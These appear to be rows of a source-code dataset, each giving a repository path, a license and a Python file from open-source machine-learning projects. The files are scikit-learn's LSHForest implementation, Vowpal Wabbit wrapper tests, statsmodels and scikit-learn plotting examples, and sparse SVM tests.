radius_cutoff_ratio : float, optional (default = 0.9)
A value ranges from 0 to 1. Radius neighbors will be searched until
the ratio between total neighbors within the radius and the total
candidates becomes less than this value unless it is terminated by
hash length reaching `min_hash_match`.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
hash_functions_ : list of GaussianRandomProjectionHash objects
Hash function g(p,x) for a tree is an array of 32 randomly generated
float arrays with the same dimenstion as the data set. This array is
stored in GaussianRandomProjectionHash object and can be obtained
from ``components_`` attribute.
trees_ : array, shape (n_estimators, n_samples)
Each tree (corresponding to a hash function) contains an array of
sorted hashed values. The array representation may change in future
versions.
original_indices_ : array, shape (n_estimators, n_samples)
Original indices of sorted hashed values in the fitted index.
References
----------
.. [1] M. Bawa, T. Condie and P. Ganesan, "LSH Forest: Self-Tuning
Indexes for Similarity Search", WWW '05 Proceedings of the
14th international conference on World Wide Web, 651-660,
2005.
Examples
--------
>>> from sklearn.neighbors import LSHForest
>>> X_train = [[5, 5, 2], [21, 5, 5], [1, 1, 1], [8, 9, 1], [6, 10, 2]]
>>> X_test = [[9, 1, 6], [3, 1, 10], [7, 10, 3]]
>>> lshf = LSHForest(random_state=42)
>>> lshf.fit(X_train) # doctest: +NORMALIZE_WHITESPACE
LSHForest(min_hash_match=4, n_candidates=50, n_estimators=10,
n_neighbors=5, radius=1.0, radius_cutoff_ratio=0.9,
random_state=42)
>>> distances, indices = lshf.kneighbors(X_test, n_neighbors=2)
>>> distances # doctest: +ELLIPSIS
array([[ 0.069..., 0.149...],
[ 0.229..., 0.481...],
[ 0.004..., 0.014...]])
>>> indices
array([[1, 2],
[2, 0],
[4, 0]])
"""
def __init__(self, n_estimators=10, radius=1.0, n_candidates=50,
n_neighbors=5, min_hash_match=4, radius_cutoff_ratio=.9,
random_state=None):
self.n_estimators = n_estimators
self.radius = radius
self.random_state = random_state
self.n_candidates = n_candidates
self.n_neighbors = n_neighbors
self.min_hash_match = min_hash_match
self.radius_cutoff_ratio = radius_cutoff_ratio
def _compute_distances(self, query, candidates):
"""Computes the cosine distance.
Distance is from the query to points in the candidates array.
Returns argsort of distances in the candidates
array and sorted distances.
"""
if candidates.shape == (0,):
# needed since _fit_X[np.array([])] doesn't work if _fit_X sparse
return np.empty(0, dtype=np.int), np.empty(0, dtype=float)
if sparse.issparse(self._fit_X):
candidate_X = self._fit_X[candidates]
else:
candidate_X = self._fit_X.take(candidates, axis=0, mode='clip')
distances = pairwise_distances(query, candidate_X,
metric='cosine')[0]
distance_positions = np.argsort(distances)
distances = distances.take(distance_positions, mode='clip', axis=0)
return distance_positions, distances
def _generate_masks(self):
"""Creates left and right masks for all hash lengths."""
tri_size = MAX_HASH_SIZE + 1
# Called once on fitting, output is independent of hashes
left_mask = np.tril(np.ones((tri_size, tri_size), dtype=int))[:, 1:]
right_mask = left_mask[::-1, ::-1]
self._left_mask = np.packbits(left_mask).view(dtype=HASH_DTYPE)
self._right_mask = np.packbits(right_mask).view(dtype=HASH_DTYPE)
def _get_candidates(self, query, max_depth, bin_queries, n_neighbors):
"""Performs the Synchronous ascending phase.
Returns an array of candidates, their distance ranks and
distances.
"""
index_size = self._fit_X.shape[0]
# Number of candidates considered including duplicates
# XXX: not sure whether this is being calculated correctly wrt
# duplicates from different iterations through a single tree
n_candidates = 0
candidate_set = set()
min_candidates = self.n_candidates * self.n_estimators
while (max_depth > self.min_hash_match and
(n_candidates < min_candidates or
len(candidate_set) < n_neighbors)):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
n_candidates += stop - start
candidate_set.update(
self.original_indices_[i][start:stop].tolist())
max_depth -= 1
candidates = np.fromiter(candidate_set, count=len(candidate_set),
dtype=np.intp)
# For insufficient candidates, candidates are filled.
# Candidates are filled from unselected indices uniformly.
if candidates.shape[0] < n_neighbors:
warnings.warn(
"Number of candidates is not sufficient to retrieve"
" %i neighbors with"
" min_hash_match = %i. Candidates are filled up"
" uniformly from unselected"
" indices." % (n_neighbors, self.min_hash_match))
remaining = np.setdiff1d(np.arange(0, index_size), candidates)
to_fill = n_neighbors - candidates.shape[0]
candidates = np.concatenate((candidates, remaining[:to_fill]))
ranks, distances = self._compute_distances(query,
candidates.astype(int))
return (candidates[ranks[:n_neighbors]],
distances[:n_neighbors])
def _get_radius_neighbors(self, query, max_depth, bin_queries, radius):
"""Finds radius neighbors from the candidates obtained.
Their distances from query are smaller than radius.
Returns radius neighbors and distances.
"""
ratio_within_radius = 1
threshold = 1 - self.radius_cutoff_ratio
total_candidates = np.array([], dtype=int)
total_neighbors = np.array([], dtype=int)
total_distances = np.array([], dtype=float)
while (max_depth > self.min_hash_match and
ratio_within_radius > threshold):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
candidates = []
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
candidates.extend(
self.original_indices_[i][start:stop].tolist())
candidates = np.setdiff1d(candidates, total_candidates)
total_candidates = np.append(total_candidates, candidates)
ranks, distances = self._compute_distances(query, candidates)
m = np.searchsorted(distances, radius, side='right')
positions = np.searchsorted(total_distances, distances[:m])
total_neighbors = np.insert(total_neighbors, positions,
candidates[ranks[:m]])
total_distances = np.insert(total_distances, positions,
distances[:m])
ratio_within_radius = (total_neighbors.shape[0] /
float(total_candidates.shape[0]))
max_depth = max_depth - 1
return total_neighbors, total_distances
def fit(self, X, y=None):
"""Fit the LSH forest on the data.
This creates binary hashes of input data points by getting the
dot product of input points and hash_function then
transforming the projection into a binary string array based
on the sign (positive/negative) of the projection.
A sorted array of binary hashes is created.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
Returns
-------
self : object
Returns self.
"""
self._fit_X = check_array(X, accept_sparse='csr')
# Creates a g(p,x) for each tree
self.hash_functions_ = []
self.trees_ = []
self.original_indices_ = []
rng = check_random_state(self.random_state)
int_max = np.iinfo(np.int32).max
for i in range(self.n_estimators):
# This is g(p,x) for a particular tree.
# Builds a single tree. Hashing is done on an array of data points.
# `GaussianRandomProjection` is used for hashing.
# `n_components=hash size and n_features=n_dim.
hasher = GaussianRandomProjectionHash(MAX_HASH_SIZE,
rng.randint(0, int_max))
hashes = hasher.fit_transform(self._fit_X)[:, 0]
original_index = np.argsort(hashes)
bin_hashes = hashes[original_index]
self.original_indices_.append(original_index)
self.trees_.append(bin_hashes)
self.hash_functions_.append(hasher)
self._generate_masks()
return self
def _query(self, X):
"""Performs descending phase to find maximum depth."""
# Calculate hashes of shape (n_samples, n_estimators, [hash_size])
bin_queries = np.asarray([hasher.transform(X)[:, 0]
for hasher in self.hash_functions_])
bin_queries = np.rollaxis(bin_queries, 1)
# descend phase
depths = [_find_longest_prefix_match(tree, tree_queries, MAX_HASH_SIZE,
self._left_mask, self._right_mask)
for tree, tree_queries in zip(self.trees_,
np.rollaxis(bin_queries, 1))]
return bin_queries, np.max(depths, axis=0)
def kneighbors(self, X, n_neighbors=None, return_distance=True):
"""Returns n_neighbors of approximate nearest neighbors.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single query.
n_neighbors : int, opitonal (default = None)
Number of neighbors required. If not provided, this will
return the number specified at the initialization.
return_distance : boolean, optional (default = False)
Returns the distances of neighbors if set to True.
Returns
-------
dist : array, shape (n_samples, n_neighbors)
Array representing the cosine distances to each point,
only present if return_distance=True.
ind : array, shape (n_samples, n_neighbors)
Indices of the approximate nearest points in the population
matrix.
"""
if not hasattr(self, 'hash_functions_'):
raise ValueError("estimator should be fitted.")
if n_neighbors is None:
n_neighbors = self.n_neighbors
X = check_array(X, accept_sparse='csr')
neighbors, distances = [], []
bin_queries, max_depth = self._query(X)
for i in range(X.shape[0]):
neighs, dists = self._get_candidates(X[[i]], max_depth[i],
bin_queries[i],
n_neighbors)
neighbors.append(neighs)
distances.append(dists)
if return_distance:
return np.array(distances), np.array(neighbors)
else:
return np.array(neighbors)
    def radius_neighbors(self, X, radius=None, return_distance=True):
        """Finds the neighbors within a given radius of a point or points.

        Return the indices and distances of some points from the dataset
        lying in a ball with size ``radius`` around the points of the query
        array. Points lying on the boundary are included in the results.

        The result points are *not* necessarily sorted by distance to their
        query point.

        LSH Forest being an approximate method, some true neighbors from the
        indexed dataset might be missing from the results.

        Parameters
        ----------
        X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
            List of n_features-dimensional data points. Each row
            corresponds to a single query.

        radius : float
            Limiting distance of neighbors to return.
            (default is the value passed to the constructor).

        return_distance : boolean, optional (default = True)
            Returns the distances of neighbors if set to True.

        Returns
        -------
        dist : array, shape (n_samples,) of arrays
            Each element is an array representing the cosine distances
            to some points found within ``radius`` of the respective query.
            Only present if ``return_distance=True``.

        ind : array, shape (n_samples,) of arrays
            Each element is an array of indices for neighbors within ``radius``
            of the respective query.
        """
        if not hasattr(self, 'hash_functions_'):
            raise ValueError("estimator should be fitted.")
        if radius is None:
            radius = self.radius
        X = check_array(X, accept_sparse='csr')
        neighbors, distances = [], []
        # One descend pass for all queries, then a per-query radius search.
        bin_queries, max_depth = self._query(X)
        for i in range(X.shape[0]):
            neighs, dists = self._get_radius_neighbors(X[[i]], max_depth[i],
                                                       bin_queries[i], radius)
            neighbors.append(neighs)
            distances.append(dists)
        if return_distance:
            # Results are ragged (variable neighbors per query), hence
            # object arrays rather than a rectangular ndarray.
            return _array_of_arrays(distances), _array_of_arrays(neighbors)
        else:
            return _array_of_arrays(neighbors)
    def partial_fit(self, X, y=None):
        """
        Inserts new data into the already fitted LSH Forest.

        Cost is proportional to new total size, so additions
        should be batched.

        Parameters
        ----------
        X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
            New data point to be inserted into the LSH Forest.

        y : ignored
            Present for scikit-learn API consistency; not used.
        """
        X = check_array(X, accept_sparse='csr')
        if not hasattr(self, 'hash_functions_'):
            # Not fitted yet: the first batch is just a plain fit.
            return self.fit(X)
        if X.shape[1] != self._fit_X.shape[1]:
            raise ValueError("Number of features in X and"
                             " fitted array does not match.")
        n_samples = X.shape[0]
        n_indexed = self._fit_X.shape[0]
        for i in range(self.n_estimators):
            bin_X = self.hash_functions_[i].transform(X)[:, 0]
            # gets the position to be added in the tree.
            positions = self.trees_[i].searchsorted(bin_X)
            # adds the hashed value into the tree (insertion at the
            # searchsorted positions keeps the tree array sorted).
            self.trees_[i] = np.insert(self.trees_[i],
                                       positions, bin_X)
            # add the entry into the original_indices_; new samples get
            # indices n_indexed .. n_indexed + n_samples - 1.
            self.original_indices_[i] = np.insert(self.original_indices_[i],
                                                  positions,
                                                  np.arange(n_indexed,
                                                            n_indexed +
                                                            n_samples))
        # adds the entry into the input_array, preserving sparsity if
        # either side is sparse.
        if sparse.issparse(X) or sparse.issparse(self._fit_X):
            self._fit_X = sparse.vstack((self._fit_X, X))
        else:
            self._fit_X = np.row_stack((self._fit_X, X))
        return self
| bsd-3-clause |
marko-asplund/vowpal_wabbit | python/test_sklearn_vw.py | 1 | 5022 | from collections import namedtuple
import numpy as np
import pytest
from sklearn.utils.estimator_checks import check_estimator
from sklearn_vw import VW, VWClassifier, VWRegressor, tovw
from sklearn import datasets
from sklearn.utils.validation import NotFittedError
from scipy.sparse import csr_matrix
"""
Test utilities to support integration of Vowpal Wabbit and scikit-learn
"""
Dataset = namedtuple('Dataset', 'x, y')
@pytest.fixture(scope='module')
def data():
    """Module-scoped fixture: a small Hastie 10.2 sample cast to float32."""
    features, labels = datasets.make_hastie_10_2(n_samples=100, random_state=1)
    return Dataset(x=features.astype(np.float32), y=labels)
class TestVW:
    """Tests for the raw VW estimator wrapper."""

    def test_validate_vw_estimator(self):
        """
        Run VW and VWClassifier through the sklearn estimator validation check

        Note: the VW estimators fail sklearn's estimator validation check. The validator creates a new
        instance of the estimator with the estimator's default args, '--quiet' in VW's case. At some point
        in the validation sequence it calls fit() with some fake data. The data gets formatted via tovw() to:
        2 1 | 0:0.5488135039273248 1:0.7151893663724195 2:0.6027633760716439 3:0.5448831829968969 4:0.4236547993389047 5:0.6458941130666561 6:0.4375872112626925 7:0.8917730007820798 8:0.9636627605010293 9:0.3834415188257777
        This gets passed into vw.learn and the python process dies with the error, "Process finished with exit code 139"
        At some point it would probably be worth while figuring out the problem this and getting the two estimators to
        pass sklearn's validation check
        """
        # check_estimator(VW)
        # check_estimator(VWClassifier)

    def test_init(self):
        assert isinstance(VW(), VW)

    def test_fit(self, data):
        model = VW(loss_function='logistic')
        assert not hasattr(model, 'fit_')
        model.fit(data.x, data.y)
        assert model.fit_

    def test_passes(self, data):
        # Two explicit passes must equal two consecutive single-pass fits.
        n_passes = 2
        model = VW(loss_function='logistic', passes=n_passes)
        assert model.passes_ == n_passes
        model.fit(data.x, data.y)
        weights = model.get_coefs()
        model = VW(loss_function='logistic')
        # first pass weights should not be the same
        model.fit(data.x, data.y)
        assert not np.allclose(weights.data, model.get_coefs().data)
        # second pass weights should match
        model.fit(data.x, data.y)
        assert np.allclose(weights.data, model.get_coefs().data)

    def test_predict_not_fit(self, data):
        model = VW(loss_function='logistic')
        with pytest.raises(NotFittedError):
            model.predict(data.x[0])

    def test_predict(self, data):
        model = VW(loss_function='logistic')
        model.fit(data.x, data.y)
        assert np.isclose(model.predict(data.x[:1][:1])[0], 0.406929)

    def test_predict_no_convert(self):
        model = VW(loss_function='logistic', convert_to_vw=False)
        model.fit(['-1 | bad', '1 | good'])
        assert np.isclose(model.predict(['| good'])[0], 0.245515)

    def test_set_params(self):
        model = VW()
        assert 'l' not in model.params
        model.set_params(l=0.1)
        assert model.params['l'] == 0.1
        # confirm model params reset with new construction
        model = VW()
        assert 'l' not in model.params

    def test_get_coefs(self, data):
        model = VW()
        model.fit(data.x, data.y)
        weights = model.get_coefs()
        # NOTE: removed a stray Python-2-only debug statement
        # (`print weights.data`) that broke the module under Python 3.
        assert np.allclose(weights.indices, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 116060])

    def test_get_intercept(self, data):
        model = VW()
        model.fit(data.x, data.y)
        intercept = model.get_intercept()
        assert isinstance(intercept, float)
class TestVWClassifier:
    """Tests for the VWClassifier wrapper."""

    def test_init(self):
        assert isinstance(VWClassifier(), VWClassifier)

    def test_decision_function(self, data):
        # Expected labels: threshold raw VW predictions at zero and map
        # them onto the {-1, +1} class values.
        label_values = np.array([-1., 1.])
        base = VW(loss_function='logistic')
        base.fit(data.x, data.y)
        raw_scores = base.predict(data.x)
        expected = label_values[(raw_scores > 0).astype(np.int)]

        clf = VWClassifier()
        clf.fit(data.x, data.y)
        assert np.allclose(expected, clf.predict(data.x))
class TestVWRegressor:
    """Tests for the VWRegressor wrapper."""

    def test_init(self):
        assert isinstance(VWRegressor(), VWRegressor)

    def test_predict(self, data):
        # The regressor must agree with a raw VW model trained identically.
        baseline = VW()
        baseline.fit(data.x, data.y)
        reg = VWRegressor()
        reg.fit(data.x, data.y)
        assert np.allclose(baseline.predict(data.x), reg.predict(data.x))
def test_tovw():
    """tovw must format dense and sparse inputs into identical VW lines."""
    features = np.array([[1.2, 3.4, 5.6, 1.0, 10], [7.8, 9.10, 11, 0, 20]])
    labels = np.array([1, -1])
    weights = [1, 2]
    expected = ['1 1 | 0:1.2 1:3.4 2:5.6 3:1 4:10',
                '-1 2 | 0:7.8 1:9.1 2:11 4:20']
    assert tovw(x=features, y=labels, sample_weight=weights) == expected
    assert tovw(x=csr_matrix(features), y=labels, sample_weight=weights) == expected
| bsd-3-clause |
jstoxrocky/statsmodels | statsmodels/sandbox/nonparametric/tests/ex_gam_new.py | 34 | 3845 | # -*- coding: utf-8 -*-
"""Example for GAM with Poisson Model and PolynomialSmoother
This example was written as a test case.
The data generating process is chosen so the parameters are well identified
and estimated.
Created on Fri Nov 04 13:45:43 2011
Author: Josef Perktold
"""
from __future__ import print_function
from statsmodels.compat.python import lrange, zip
import time
import numpy as np
#import matplotlib.pyplot as plt
np.seterr(all='raise')
from scipy import stats
from statsmodels.sandbox.gam import AdditiveModel
from statsmodels.sandbox.gam import Model as GAM #?
from statsmodels.genmod.families import family
from statsmodels.genmod.generalized_linear_model import GLM
np.random.seed(8765993)
#seed is chosen for nice result, not randomly
#other seeds are pretty off in the prediction or end in overflow
#DGP: simple polynomial
order = 3
sigma_noise = 0.1
nobs = 1000
#lb, ub = -0.75, 3#1.5#0.75 #2.5
lb, ub = -3.5, 3
x1 = np.linspace(lb, ub, nobs)
x2 = np.sin(2*x1)
x = np.column_stack((x1/x1.max()*1, 1.*x2))
exog = (x[:,:,None]**np.arange(order+1)[None, None, :]).reshape(nobs, -1)
idx = lrange((order+1)*2)
del idx[order+1]
exog_reduced = exog[:,idx] #remove duplicate constant
y_true = exog.sum(1) #/ 4.
z = y_true #alias check
d = x
y = y_true + sigma_noise * np.random.randn(nobs)
example = 3
if example == 2:
print("binomial")
f = family.Binomial()
mu_true = f.link.inverse(z)
#b = np.asarray([scipy.stats.bernoulli.rvs(p) for p in f.link.inverse(y)])
b = np.asarray([stats.bernoulli.rvs(p) for p in f.link.inverse(z)])
b.shape = y.shape
m = GAM(b, d, family=f)
toc = time.time()
m.fit(b)
tic = time.time()
print(tic-toc)
#for plotting
yp = f.link.inverse(y)
p = b
if example == 3:
print("Poisson")
f = family.Poisson()
#y = y/y.max() * 3
yp = f.link.inverse(z)
#p = np.asarray([scipy.stats.poisson.rvs(p) for p in f.link.inverse(y)], float)
p = np.asarray([stats.poisson.rvs(p) for p in f.link.inverse(z)], float)
p.shape = y.shape
m = GAM(p, d, family=f)
toc = time.time()
m.fit(p)
tic = time.time()
print(tic-toc)
for ss in m.smoothers:
print(ss.params)
if example > 1:
import matplotlib.pyplot as plt
plt.figure()
for i in np.array(m.history[2:15:3]): plt.plot(i.T)
plt.figure()
plt.plot(exog)
#plt.plot(p, '.', lw=2)
plt.plot(y_true, lw=2)
y_pred = m.results.mu # + m.results.alpha #m.results.predict(d)
plt.figure()
plt.subplot(2,2,1)
plt.plot(p, '.')
plt.plot(yp, 'b-', label='true')
plt.plot(y_pred, 'r-', label='GAM')
plt.legend(loc='upper left')
plt.title('gam.GAM Poisson')
counter = 2
for ii, xx in zip(['z', 'x1', 'x2'], [z, x[:,0], x[:,1]]):
sortidx = np.argsort(xx)
#plt.figure()
plt.subplot(2, 2, counter)
plt.plot(xx[sortidx], p[sortidx], 'k.', alpha=0.5)
plt.plot(xx[sortidx], yp[sortidx], 'b.', label='true')
plt.plot(xx[sortidx], y_pred[sortidx], 'r.', label='GAM')
plt.legend(loc='upper left')
plt.title('gam.GAM Poisson ' + ii)
counter += 1
res = GLM(p, exog_reduced, family=f).fit()
#plot component, compared to true component
x1 = x[:,0]
x2 = x[:,1]
f1 = exog[:,:order+1].sum(1) - 1 #take out constant
f2 = exog[:,order+1:].sum(1) - 1
plt.figure()
#Note: need to correct for constant which is indeterminatedly distributed
#plt.plot(x1, m.smoothers[0](x1)-m.smoothers[0].params[0]+1, 'r')
#better would be subtract f(0) m.smoothers[0](np.array([0]))
plt.plot(x1, f1, linewidth=2)
plt.plot(x1, m.smoothers[0](x1)-m.smoothers[0].params[0], 'r')
plt.figure()
plt.plot(x2, f2, linewidth=2)
plt.plot(x2, m.smoothers[1](x2)-m.smoothers[1].params[0], 'r')
plt.show() | bsd-3-clause |
bhargav/scikit-learn | examples/linear_model/plot_ard.py | 29 | 2828 | """
==================================================
Automatic Relevance Determination Regression (ARD)
==================================================
Fit regression model with Bayesian Ridge Regression.
See :ref:`bayesian_ridge_regression` for more information on the regressor.
Compared to the OLS (ordinary least squares) estimator, the coefficient
weights are slightly shifted toward zeros, which stabilises them.
The histogram of the estimated weights is very peaked, as a sparsity-inducing
prior is implied on the weights.
The estimation of the model is done by iteratively maximizing the
marginal log-likelihood of the observations.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.linear_model import ARDRegression, LinearRegression
###############################################################################
# Generating simulated data with Gaussian weights
# Parameters of the example
np.random.seed(0)
n_samples, n_features = 100, 100
# Create Gaussian data
X = np.random.randn(n_samples, n_features)
# Create weights with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noise with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
###############################################################################
# Fit the ARD Regression
clf = ARDRegression(compute_score=True)
clf.fit(X, y)
ols = LinearRegression()
ols.fit(X, y)
###############################################################################
# Plot the true weights, the estimated weights and the histogram of the
# weights
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
plt.plot(clf.coef_, color='darkblue', linestyle='-', linewidth=2,
label="ARD estimate")
plt.plot(ols.coef_, color='yellowgreen', linestyle=':', linewidth=2,
label="OLS estimate")
plt.plot(w, color='orange', linestyle='-', linewidth=2, label="Ground truth")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc=1)
plt.figure(figsize=(6, 5))
plt.title("Histogram of the weights")
plt.hist(clf.coef_, bins=n_features, color='navy', log=True)
plt.scatter(clf.coef_[relevant_features], 5 * np.ones(len(relevant_features)),
color='gold', marker='o', label="Relevant features")
plt.ylabel("Features")
plt.xlabel("Values of the weights")
plt.legend(loc=1)
plt.figure(figsize=(6, 5))
plt.title("Marginal log-likelihood")
plt.plot(clf.scores_, color='navy', linewidth=2)
plt.ylabel("Score")
plt.xlabel("Iterations")
plt.show()
| bsd-3-clause |
wanggang3333/scikit-learn | examples/mixture/plot_gmm_sin.py | 248 | 2747 | """
=================================
Gaussian Mixture Model Sine Curve
=================================
This example highlights the advantages of the Dirichlet Process:
complexity control and dealing with sparse data. The dataset is formed
by 100 points loosely spaced following a noisy sine curve. The fit by
the GMM class, using the expectation-maximization algorithm to fit a
mixture of 10 Gaussian components, finds too-small components and very
little structure. The fits by the Dirichlet process, however, show
that the model can either learn a global structure for the data (small
alpha) or easily interpolate to finding relevant local structure
(large alpha), never falling into the problems shown by the GMM class.
"""
import itertools
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn import mixture
from sklearn.externals.six.moves import xrange
# Number of samples per component
n_samples = 100
# Generate random sample following a sine curve
np.random.seed(0)
X = np.zeros((n_samples, 2))
step = 4 * np.pi / n_samples
for i in xrange(X.shape[0]):
x = i * step - 6
X[i, 0] = x + np.random.normal(0, 0.1)
X[i, 1] = 3 * (np.sin(x) + np.random.normal(0, .2))
color_iter = itertools.cycle(['r', 'g', 'b', 'c', 'm'])
for i, (clf, title) in enumerate([
(mixture.GMM(n_components=10, covariance_type='full', n_iter=100),
"Expectation-maximization"),
(mixture.DPGMM(n_components=10, covariance_type='full', alpha=0.01,
n_iter=100),
"Dirichlet Process,alpha=0.01"),
(mixture.DPGMM(n_components=10, covariance_type='diag', alpha=100.,
n_iter=100),
"Dirichlet Process,alpha=100.")]):
clf.fit(X)
splot = plt.subplot(3, 1, 1 + i)
Y_ = clf.predict(X)
for i, (mean, covar, color) in enumerate(zip(
clf.means_, clf._get_covars(), color_iter)):
v, w = linalg.eigh(covar)
u = w[0] / linalg.norm(w[0])
# as the DP will not use every component it has access to
# unless it needs it, we shouldn't plot the redundant
# components.
if not np.any(Y_ == i):
continue
plt.scatter(X[Y_ == i, 0], X[Y_ == i, 1], .8, color=color)
# Plot an ellipse to show the Gaussian component
angle = np.arctan(u[1] / u[0])
angle = 180 * angle / np.pi # convert to degrees
ell = mpl.patches.Ellipse(mean, v[0], v[1], 180 + angle, color=color)
ell.set_clip_box(splot.bbox)
ell.set_alpha(0.5)
splot.add_artist(ell)
plt.xlim(-6, 4 * np.pi - 6)
plt.ylim(-5, 5)
plt.title(title)
plt.xticks(())
plt.yticks(())
plt.show()
| bsd-3-clause |
icdishb/scikit-learn | sklearn/svm/tests/test_sparse.py | 15 | 12169 | from nose.tools import assert_raises, assert_true, assert_false
import numpy as np
from scipy import sparse
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_equal)
from sklearn import datasets, svm, linear_model, base
from sklearn.datasets import make_classification, load_digits, make_blobs
from sklearn.svm.tests import test_svm
from sklearn.utils import ConvergenceWarning
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.testing import assert_warns, assert_raise_message
# test sample 1
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
X_sp = sparse.lil_matrix(X)
Y = [1, 1, 1, 2, 2, 2]
T = np.array([[-1, -1], [2, 2], [3, 2]])
true_result = [1, 2, 2]
# test sample 2
X2 = np.array([[0, 0, 0], [1, 1, 1], [2, 0, 0, ],
[0, 0, 2], [3, 3, 3]])
X2_sp = sparse.dok_matrix(X2)
Y2 = [1, 2, 2, 2, 3]
T2 = np.array([[-1, -1, -1], [1, 1, 1], [2, 2, 2]])
true_result2 = [1, 2, 3]
iris = datasets.load_iris()
# permute
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# sparsify
iris.data = sparse.csr_matrix(iris.data)
def check_svm_model_equal(dense_svm, sparse_svm, X_train, y_train, X_test):
    """Fit ``dense_svm`` on dense data and ``sparse_svm`` on sparse data,
    then assert the fitted models and their predictions (almost) agree.

    Also checks that a dense-trained SVC refuses sparse input at predict
    time with an informative error message.
    """
    dense_svm.fit(X_train.toarray(), y_train)
    if sparse.isspmatrix(X_test):
        X_test_dense = X_test.toarray()
    else:
        X_test_dense = X_test
    sparse_svm.fit(X_train, y_train)
    # Sparse training must yield sparse support vectors / dual coefs.
    assert_true(sparse.issparse(sparse_svm.support_vectors_))
    assert_true(sparse.issparse(sparse_svm.dual_coef_))
    assert_array_almost_equal(dense_svm.support_vectors_,
                              sparse_svm.support_vectors_.toarray())
    assert_array_almost_equal(dense_svm.dual_coef_, sparse_svm.dual_coef_.toarray())
    if dense_svm.kernel == "linear":
        # coef_ is only defined for the linear kernel.
        assert_true(sparse.issparse(sparse_svm.coef_))
        assert_array_almost_equal(dense_svm.coef_, sparse_svm.coef_.toarray())
    assert_array_almost_equal(dense_svm.support_, sparse_svm.support_)
    assert_array_almost_equal(dense_svm.predict(X_test_dense), sparse_svm.predict(X_test))
    assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
                              sparse_svm.decision_function(X_test))
    assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
                              sparse_svm.decision_function(X_test_dense))
    # Probabilities are compared with a looser tolerance (4 decimals).
    assert_array_almost_equal(dense_svm.predict_proba(X_test_dense),
                              sparse_svm.predict_proba(X_test), 4)
    msg = "cannot use sparse input in 'SVC' trained on dense data"
    if sparse.isspmatrix(X_test):
        # A dense-trained model must reject sparse input at predict time.
        assert_raise_message(ValueError, msg, dense_svm.predict, X_test)
def test_svc():
"""Check that sparse SVC gives the same result as SVC"""
# many class dataset:
X_blobs, y_blobs = make_blobs(n_samples=100, centers=10, random_state=0)
X_blobs = sparse.csr_matrix(X_blobs)
datasets = [[X_sp, Y, T], [X2_sp, Y2, T2],
[X_blobs[:80], y_blobs[:80], X_blobs[80:]],
[iris.data, iris.target, iris.data]]
kernels = ["linear", "poly", "rbf", "sigmoid"]
for dataset in datasets:
for kernel in kernels:
clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
sp_clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
check_svm_model_equal(clf, sp_clf, *dataset)
def test_unsorted_indices():
# test that the result with sorted and unsorted indices in csr is the same
# we use a subset of digits as iris, blobs or make_classification didn't
# show the problem
digits = load_digits()
X, y = digits.data[:50], digits.target[:50]
X_test = sparse.csr_matrix(digits.data[50:100])
X_sparse = sparse.csr_matrix(X)
coef_dense = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X, y).coef_
sparse_svc = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X_sparse, y)
coef_sorted = sparse_svc.coef_
# make sure dense and sparse SVM give the same result
assert_array_almost_equal(coef_dense, coef_sorted.toarray())
X_sparse_unsorted = X_sparse[np.arange(X.shape[0])]
X_test_unsorted = X_test[np.arange(X_test.shape[0])]
# make sure we scramble the indices
assert_false(X_sparse_unsorted.has_sorted_indices)
assert_false(X_test_unsorted.has_sorted_indices)
unsorted_svc = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X_sparse_unsorted, y)
coef_unsorted = unsorted_svc.coef_
# make sure unsorted indices give same result
assert_array_almost_equal(coef_unsorted.toarray(), coef_sorted.toarray())
assert_array_almost_equal(sparse_svc.predict_proba(X_test_unsorted),
sparse_svc.predict_proba(X_test))
def test_svc_with_custom_kernel():
    # A callable linear kernel must reproduce the built-in 'linear' kernel.
    def kfunc(a, b):
        return safe_sparse_dot(a, b.T)

    clf_builtin = svm.SVC(kernel='linear').fit(X_sp, Y)
    clf_callable = svm.SVC(kernel=kfunc).fit(X_sp, Y)
    assert_array_equal(clf_builtin.predict(X_sp), clf_callable.predict(X_sp))
def test_svc_iris():
# Test the sparse SVC with the iris dataset
for k in ('linear', 'poly', 'rbf'):
sp_clf = svm.SVC(kernel=k).fit(iris.data, iris.target)
clf = svm.SVC(kernel=k).fit(iris.data.toarray(), iris.target)
assert_array_almost_equal(clf.support_vectors_,
sp_clf.support_vectors_.toarray())
